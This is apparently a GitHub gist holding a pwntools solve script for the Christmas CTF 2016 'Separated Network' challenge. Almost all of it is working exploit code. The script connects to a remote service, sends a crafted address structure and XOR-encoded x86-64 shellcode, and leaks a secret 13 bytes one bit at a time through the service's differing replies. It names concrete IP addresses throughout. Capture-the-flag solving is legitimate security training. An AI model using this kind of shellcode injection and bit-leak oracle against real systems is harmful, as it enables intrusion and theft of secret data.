@Jinmo
Created December 25, 2016 06:10
Christmas CTF 2016 Separated Network
from pwn import *
from socket import AF_INET
import itertools
# Tell pwntools to target 64-bit x86; the asm() call further down uses this setting.
context.arch = 'x86_64'
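def encrypt(x):
    """XOR every character of *x* with a repeating 15-entry key.

    The key contains only the values 1 and 2 and is cycled when *x* is longer
    than the key. Because XOR is its own inverse, calling the function twice
    returns the original string, so the same routine encodes and decodes.

    Returns a new string of the same length as *x* (empty input gives '').
    """
    key = (1, 2, 2, 1, 1, 1, 2, 2, 1, 1, 1, 2, 2, 1, 1)
    # Build the result with one join instead of growing a string with += per
    # character, which is quadratic on long inputs.
    return ''.join(chr(ord(c) ^ k) for c, k in zip(x, itertools.cycle(key)))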
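# CTF solve script. It treats str as bytes throughout (bytearray('\x00' * n),
# str(bytearray)), so it runs under Python 2 only. It relies on pwntools
# (`from pwn import *`) and on encrypt() defined earlier in this file.

# Address and port that get packed into `obj` below. The first pair is
# overwritten by the second before it is ever used, so only
# 192.168.226.132:12345 takes effect.
host = '45.55.68.215'
port = 30303
host = '192.168.226.132'
port = 12345

# Number of bytes recovered; one result byte per index, filled in bit by bit.
FLAG_LEN = 13
flag = bytearray('\x00' * FLAG_LEN)

print(encrypt('SHELLCODER'))

# Probe template. It loads one byte from 0x601050+index, masks it with a
# single bit and jumps to one of two fixed addresses depending on the result.
# The mask is passed in as (1 << bit) + 1 and decremented by `dec bl`; the
# reason for that detour is not shown on the page.
# NOTE(review): presumably 0x601050 is where the service keeps the secret and
# 0x400636 / 0x400653 are code paths in the service binary with different
# visible output -- the binary is not part of this page, so confirm there.
PROBE_ASM = '''
mov al, byte ptr [0x601050+%d]
mov bl, %d
dec bl
and al, bl
jnz true
false:
mov eax, 0x400653
jmp rax
true:
mov eax, 0x400636
jmp rax
'''


def inet_addr(x):
    """Return the dotted-quad IPv4 string *x* as a 32-bit integer."""
    octets = x.split('.')
    return sum(int(octets[i]) << (8 * (3 - i)) for i in range(4))


# First message sent on every connection: 32 filler bytes followed by bytes
# laid out as address family, big-endian port, big-endian IPv4 address, and a
# trailing 'a'. It does not depend on the loop variables, so it is built once
# here instead of on each of the 13 * 8 connections.
obj = ('A' * 32 + p16(AF_INET) + p16(port, endian='big')
       + p32(inet_addr(host), endian='big') + 'a')

# One connection per (byte, bit) pair: the service's reply differs between the
# two jump targets, so each connection reveals exactly one bit.
for index in range(FLAG_LEN):
    for bit in range(8):
        r = remote('220.126.183.99', 32123)
        shellcode = asm(PROBE_ASM % (index, (1 << bit) + 1))
        # Marker string, ten spaces of padding, then the assembled probe.
        payload = "SHELLCODER" + ''.ljust(10) + shellcode
        r.recvline()
        r.send(obj)
        r.sendline('2')
        r.recvuntil('Messages are encrypted and Delivered.\n')
        r.sendline(encrypt(payload))
        # recvall() reads until the peer closes the connection.
        data = r.recvall()
        print('%s %s %s' % (repr(data), index, 1 << bit))
        if data == 'Message Sent successfully.':
            flag[index] |= 1 << bit
        # NOTE(review): the page lost its indentation; the progress print is
        # placed once per probe here -- it may originally have been nested
        # under the `if` or the outer loop.
        print(repr(flag))

flag = str(flag)
print(flag)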